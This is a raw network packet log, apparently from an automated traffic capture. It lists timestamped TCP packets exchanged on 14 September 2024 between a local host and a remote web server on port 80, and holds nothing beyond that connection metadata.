                                        Sep 14, 2024 18:31:14.307914019 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.307915926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.307928085 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.307938099 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.307950020 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.307960033 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.307966948 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.307988882 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.308031082 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.308124065 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308134079 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308142900 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308165073 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308173895 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308185101 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308185101 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.308240891 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.308276892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308288097 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308296919 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308310032 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308320999 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308336020 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308341026 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.308347940 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308357000 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308367968 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308370113 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.308377981 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308398962 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308408022 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308412075 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.308418036 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308429003 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308433056 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.308439016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308451891 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.308470011 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.308489084 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.312028885 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312046051 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312055111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312103987 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.312138081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312146902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312155008 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.312158108 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312191010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312196016 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.312200069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312248945 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.312258005 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312302113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312311888 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312319040 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.312356949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312366962 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312369108 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.312378883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312388897 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312438965 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.312459946 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.312463045 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312474012 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312484026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312500000 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312510014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312529087 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.312536001 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312546968 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.312551975 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.312593937 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.359632015 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.368551970 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368561029 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368571043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368722916 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368731976 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368737936 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368742943 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368748903 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368752956 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368757963 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368762970 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368767977 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368853092 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368861914 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368953943 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368963003 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368961096 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.368968964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368973970 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368980885 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.368988037 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.369103909 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.369112968 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.369129896 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.369139910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.369149923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.369159937 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.369169950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.369180918 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.369189978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.369322062 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.369322062 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.369322062 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.393953085 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394100904 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394166946 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394176006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394191027 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394200087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394203901 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394213915 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394218922 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394223928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394236088 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394246101 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394251108 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394259930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394263983 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394305944 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394330025 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394337893 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394349098 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394360065 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394366980 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394376040 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394386053 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394395113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394399881 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394445896 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394460917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394471884 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394527912 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394586086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394597054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394607067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394617081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394628048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394638062 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394661903 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394695044 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394697905 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394710064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394720078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394730091 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394741058 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394756079 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394793987 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394794941 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394855022 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394865036 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394874096 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394884109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394895077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394905090 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394912958 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394915104 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394926071 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.394941092 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394973040 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.394999027 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.395173073 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395184040 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395194054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395204067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395214081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395222902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395232916 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395232916 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.395243883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395255089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395262957 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395277023 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395279884 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.395287991 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395298958 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395308018 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.395308971 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395318985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395329952 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.395370007 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.395504951 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395514965 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395524979 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395536900 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395546913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395556927 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395566940 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.395567894 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395579100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395590067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395590067 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.395598888 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395612001 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.395612001 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.395629883 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.395672083 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.399209023 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399219036 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399235010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399271965 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.399310112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399319887 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399328947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399338961 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399365902 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.399420023 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.399627924 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399689913 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.399733067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399786949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399838924 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399874926 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.399899006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399930954 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.399970055 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.400002956 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.400034904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.400054932 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.400085926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.400118113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.400141954 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.400171995 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.400206089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.400226116 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.400258064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.400294065 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.400316954 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.453197002 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.455655098 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.455718040 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.455754042 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.455789089 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.455820084 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.455884933 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.455900908 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.455950975 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.455985069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456012964 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.456072092 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456124067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456145048 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.456176043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456232071 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.456249952 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456280947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456314087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456336021 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.456365108 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456398964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456419945 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.456449986 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456490040 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456510067 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.456537962 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456571102 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456590891 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.456623077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456655025 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456676006 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.456707954 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456739902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456763029 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.456793070 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456825018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456845999 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.456875086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456906080 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456927061 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.456957102 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.456989050 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.457016945 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.457050085 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.457082987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.457104921 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.457135916 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.457190037 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.481085062 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481234074 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481249094 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481302023 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481343031 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.481374979 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.481421947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481473923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481508970 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481533051 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.481564045 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481601954 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481622934 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.481672049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481722116 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.481745005 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481776953 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481811047 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481831074 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.481883049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481914997 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.481950045 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.481970072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482026100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482043028 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.482090950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482125044 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482161045 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.482178926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482212067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482233047 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.482269049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482300043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482325077 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.482353926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482404947 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.482429981 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482460976 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482511997 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.482532978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482584953 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482618093 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482637882 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.482667923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482703924 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482723951 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.482753992 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482786894 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482809067 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.482837915 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482870102 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482891083 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.482922077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482953072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.482973099 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.483002901 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.483032942 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.483057022 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.483082056 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.483114004 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.483135939 CEST4973880192.168.2.4172.67.203.195
